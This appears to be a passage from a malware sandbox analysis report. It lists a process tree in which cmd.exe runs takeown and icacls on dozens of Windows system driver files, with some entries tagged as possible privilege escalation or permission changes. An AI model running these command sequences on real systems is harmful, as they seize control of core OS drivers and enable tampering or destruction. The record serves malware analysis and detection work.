C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ql2300.sys /grant "Admin:F"3⤵PID:4244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql40xx.sys && icacls C:\Windows\System32\drivers\ql40xx.sys /grant "%username%:F" && exit2⤵PID:4116
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ql40xx.sys3⤵PID:1060
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ql40xx.sys /grant "Admin:F"3⤵PID:4288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\qwavedrv.sys && icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "%username%:F" && exit2⤵PID:4228
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\qwavedrv.sys3⤵PID:2132
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\qwavedrv.sys /grant "Admin:F"3⤵PID:4168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasacd.sys && icacls C:\Windows\System32\drivers\rasacd.sys /grant "%username%:F" && exit2⤵PID:4240
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rasacd.sys3⤵PID:4340
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rasacd.sys /grant "Admin:F"3⤵PID:4396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasl2tp.sys && icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "%username%:F" && exit2⤵PID:4220
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rasl2tp.sys3⤵PID:4424
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rasl2tp.sys /grant "Admin:F"3⤵PID:4540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspppoe.sys && icacls C:\Windows\System32\drivers\raspppoe.sys /grant "%username%:F" && exit2⤵PID:4236
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\raspppoe.sys3⤵
- Modifies file permissions
PID:4452
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\raspppoe.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspptp.sys && icacls C:\Windows\System32\drivers\raspptp.sys /grant "%username%:F" && exit2⤵PID:4312
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\raspptp.sys3⤵PID:4636
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\raspptp.sys /grant "Admin:F"3⤵PID:4728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rassstp.sys && icacls C:\Windows\System32\drivers\rassstp.sys /grant "%username%:F" && exit2⤵PID:4308
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rassstp.sys3⤵PID:4648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rassstp.sys /grant "Admin:F"3⤵PID:4552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdbss.sys && icacls C:\Windows\System32\drivers\rdbss.sys /grant "%username%:F" && exit2⤵PID:4492
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdbss.sys3⤵PID:4768
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdbss.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpbus.sys && icacls C:\Windows\System32\drivers\rdpbus.sys /grant "%username%:F" && exit2⤵PID:4564
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpbus.sys3⤵PID:4584
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpbus.sys /grant "Admin:F"3⤵PID:4860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPCDD.sys && icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "%username%:F" && exit2⤵PID:4712
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPCDD.sys3⤵PID:4592
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RDPCDD.sys /grant "Admin:F"3⤵PID:4624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpdr.sys && icacls C:\Windows\System32\drivers\rdpdr.sys /grant "%username%:F" && exit2⤵PID:4732
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpdr.sys3⤵PID:4684
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpdr.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPENCDD.sys && icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "%username%:F" && exit2⤵PID:4744
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPENCDD.sys3⤵
- Modifies file permissions
PID:4796
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "Admin:F"3⤵PID:3472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPREFMP.sys && icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "%username%:F" && exit2⤵PID:4824
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPREFMP.sys3⤵PID:4852
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys && icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "%username%:F" && exit2⤵PID:4696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpvideominiport.sys3⤵PID:5008
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "Admin:F"3⤵PID:3692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpwd.sys && icacls C:\Windows\System32\drivers\rdpwd.sys /grant "%username%:F" && exit2⤵PID:4736
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpwd.sys3⤵PID:5112
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpwd.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdyboost.sys && icacls C:\Windows\System32\drivers\rdyboost.sys /grant "%username%:F" && exit2⤵PID:5020
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdyboost.sys3⤵
- Possible privilege escalation attempt
PID:4064
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdyboost.sys /grant "Admin:F"3⤵PID:4196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rmcast.sys && icacls C:\Windows\System32\drivers\rmcast.sys /grant "%username%:F" && exit2⤵PID:3620
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rmcast.sys3⤵PID:4164
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rmcast.sys /grant "Admin:F"3⤵PID:4160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RNDISMP.sys && icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "%username%:F" && exit2⤵PID:4112
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RNDISMP.sys3⤵PID:4988
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RNDISMP.sys /grant "Admin:F"3⤵PID:4244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rootmdm.sys && icacls C:\Windows\System32\drivers\rootmdm.sys /grant "%username%:F" && exit2⤵PID:5036
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rootmdm.sys3⤵PID:3136
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rootmdm.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rspndr.sys && icacls C:\Windows\System32\drivers\rspndr.sys /grant "%username%:F" && exit2⤵PID:4176
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rspndr.sys3⤵PID:4076
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rspndr.sys /grant "Admin:F"3⤵PID:4456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Rtnic64.sys && icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "%username%:F" && exit2⤵PID:4264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Rtnic64.sys3⤵PID:4216
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Rtnic64.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbm1mhnwjdiiaa.sys && icacls C:\Windows\System32\drivers\sbm1mhnwjdiiaa.sys /grant "%username%:F" && exit2⤵PID:4332
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sbm1mhnwjdiiaa.sys3⤵PID:4632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sbm1mhnwjdiiaa.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbp2port.sys && icacls C:\Windows\System32\drivers\sbp2port.sys /grant "%username%:F" && exit2⤵PID:4168
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sbp2port.sys3⤵PID:4648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sbp2port.sys /grant "Admin:F"3⤵PID:4716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scfilter.sys && icacls C:\Windows\System32\drivers\scfilter.sys /grant "%username%:F" && exit2⤵PID:4300
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\scfilter.sys3⤵PID:4352
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\scfilter.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scsiport.sys && icacls C:\Windows\System32\drivers\scsiport.sys /grant "%username%:F" && exit2⤵PID:4452
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\scsiport.sys3⤵PID:4500
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\scsiport.sys /grant "Admin:F"3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\secdrv.sys && icacls C:\Windows\System32\drivers\secdrv.sys /grant "%username%:F" && exit2⤵PID:4368
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\secdrv.sys3⤵PID:4860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\secdrv.sys /grant "Admin:F"3⤵PID:4624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serenum.sys && icacls C:\Windows\System32\drivers\serenum.sys /grant "%username%:F" && exit2⤵PID:4760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\serenum.sys3⤵PID:3704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\serenum.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serial.sys && icacls C:\Windows\System32\drivers\serial.sys /grant "%username%:F" && exit2⤵PID:4768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\serial.sys3⤵PID:4864
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\serial.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sermouse.sys && icacls C:\Windows\System32\drivers\sermouse.sys /grant "%username%:F" && exit2⤵PID:4872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sermouse.sys3⤵PID:4108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sermouse.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffdisk.sys && icacls C:\Windows\System32\drivers\sffdisk.sys /grant "%username%:F" && exit2⤵PID:4800
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffdisk.sys3⤵
- Possible privilege escalation attempt
PID:4796
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sffdisk.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_mmc.sys && icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "%username%:F" && exit2⤵PID:4984
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffp_mmc.sys3⤵PID:4132
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "Admin:F"3⤵PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_sd.sys && icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "%username%:F" && exit2⤵PID:4808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffp_sd.sys3⤵PID:5032
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sffp_sd.sys /grant "Admin:F"3⤵PID:5012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sfloppy.sys && icacls C:\Windows\System32\drivers\sfloppy.sys /grant "%username%:F" && exit2⤵PID:4700
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sfloppy.sys3⤵PID:4920
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sfloppy.sys /grant "Admin:F"3⤵PID:4296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid2.sys && icacls C:\Windows\System32\drivers\sisraid2.sys /grant "%username%:F" && exit2⤵PID:4144
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sisraid2.sys3⤵
- Modifies file permissions
PID:4156
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sisraid2.sys /grant "Admin:F"3⤵PID:3200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid4.sys && icacls C:\Windows\System32\drivers\sisraid4.sys /grant "%username%:F" && exit2⤵PID:3364
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sisraid4.sys3⤵PID:4928
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sisraid4.sys /grant "Admin:F"3⤵PID:4552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smb.sys && icacls C:\Windows\System32\drivers\smb.sys /grant "%username%:F" && exit2⤵PID:3684
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\smb.sys3⤵
- Modifies file permissions
PID:4640
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\smb.sys /grant "Admin:F"3⤵PID:4500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smclib.sys && icacls C:\Windows\System32\drivers\smclib.sys /grant "%username%:F" && exit2⤵PID:3136
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\smclib.sys3⤵PID:4648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\smclib.sys /grant "Admin:F"3⤵PID:4592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spldr.sys && icacls C:\Windows\System32\drivers\spldr.sys /grant "%username%:F" && exit2⤵PID:4964
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\spldr.sys3⤵
- Possible privilege escalation attempt
PID:4456
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\spldr.sys /grant "Admin:F"3⤵PID:4892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spsys.sys && icacls C:\Windows\System32\drivers\spsys.sys /grant "%username%:F" && exit2⤵PID:4076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\spsys.sys3⤵PID:4388
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\spsys.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv.sys && icacls C:\Windows\System32\drivers\srv.sys /grant "%username%:F" && exit2⤵PID:4352
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv.sys3⤵
- Modifies file permissions
PID:4360
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srv.sys /grant "Admin:F"3⤵PID:3720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv2.sys && icacls C:\Windows\System32\drivers\srv2.sys /grant "%username%:F" && exit2⤵PID:4432
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv2.sys3⤵PID:4896
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srv2.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srvnet.sys && icacls C:\Windows\System32\drivers\srvnet.sys /grant "%username%:F" && exit2⤵PID:4320
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srvnet.sys3⤵PID:4604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srvnet.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stexstor.sys && icacls C:\Windows\System32\drivers\stexstor.sys /grant "%username%:F" && exit2⤵PID:4636
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stexstor.sys3⤵PID:4968
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\stexstor.sys /grant "Admin:F"3⤵PID:4780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storport.sys && icacls C:\Windows\System32\drivers\storport.sys /grant "%username%:F" && exit2⤵PID:4868
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storport.sys3⤵PID:5084
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\storport.sys /grant "Admin:F"3⤵PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storvsc.sys && icacls C:\Windows\System32\drivers\storvsc.sys /grant "%username%:F" && exit2⤵PID:4148
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storvsc.sys3⤵PID:4776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\storvsc.sys /grant "Admin:F"3⤵PID:4196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stream.sys && icacls C:\Windows\System32\drivers\stream.sys /grant "%username%:F" && exit2⤵PID:5028
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stream.sys3⤵PID:4340
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\stream.sys /grant "Admin:F"3⤵PID:4416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\swenum.sys && icacls C:\Windows\System32\drivers\swenum.sys /grant "%username%:F" && exit2⤵PID:5064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\swenum.sys3⤵
- Modifies file permissions
PID:5048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\swenum.sys /grant "Admin:F"3⤵PID:4248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys && icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "%username%:F" && exit2⤵PID:4836
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Synth3dVsc.sys3⤵PID:4348
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "Admin:F"3⤵PID:4876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tape.sys && icacls C:\Windows\System32\drivers\tape.sys /grant "%username%:F" && exit2⤵PID:4908
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tape.sys3⤵PID:4256
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tape.sys /grant "Admin:F"3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpip.sys && icacls C:\Windows\System32\drivers\tcpip.sys /grant "%username%:F" && exit2⤵PID:3200
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpip.sys3⤵PID:4832
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tcpip.sys /grant "Admin:F"3⤵PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpipreg.sys && icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "%username%:F" && exit2⤵PID:4464
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpipreg.sys3⤵PID:4812
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tcpipreg.sys /grant "Admin:F"3⤵PID:4520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdi.sys && icacls C:\Windows\System32\drivers\tdi.sys /grant "%username%:F" && exit2⤵PID:4380
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdi.sys3⤵
- Modifies file permissions
PID:3272
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tdi.sys /grant "Admin:F"3⤵PID:4780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdpipe.sys && icacls C:\Windows\System32\drivers\tdpipe.sys /grant "%username%:F" && exit2⤵PID:4316
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdpipe.sys3⤵PID:4360
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tdpipe.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdtcp.sys && icacls C:\Windows\System32\drivers\tdtcp.sys /grant "%username%:F" && exit2⤵PID:4892
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdtcp.sys3⤵
- Possible privilege escalation attempt
PID:5108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tdtcp.sys /grant "Admin:F"3⤵PID:4088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdx.sys && icacls C:\Windows\System32\drivers\tdx.sys /grant "%username%:F" && exit2⤵PID:5008
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdx.sys3⤵
- Modifies file permissions
PID:5056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tdx.sys /grant "Admin:F"3⤵PID:4180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\termdd.sys && icacls C:\Windows\System32\drivers\termdd.sys /grant "%username%:F" && exit2⤵PID:4212
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\termdd.sys3⤵
- Possible privilege escalation attempt
PID:5048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\termdd.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\terminpt.sys && icacls C:\Windows\System32\drivers\terminpt.sys /grant "%username%:F" && exit2⤵PID:4604
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\terminpt.sys3⤵PID:4624
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\terminpt.sys /grant "Admin:F"3⤵PID:4988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tssecsrv.sys && icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "%username%:F" && exit2⤵PID:4596
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tssecsrv.sys3⤵PID:4508
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tssecsrv.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys && icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "%username%:F" && exit2⤵PID:4164
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbFlt.sys3⤵PID:4140
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "Admin:F"3⤵PID:4400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbGD.sys && icacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "%username%:F" && exit2⤵PID:4916
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbGD.sys3⤵
- Possible privilege escalation attempt
PID:4500
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tsusbhub.sys && icacls C:\Windows\System32\drivers\tsusbhub.sys /grant "%username%:F" && exit2⤵PID:4260
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tsusbhub.sys3⤵PID:3272
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tsusbhub.sys /grant "Admin:F"3⤵PID:3600
-
-
-
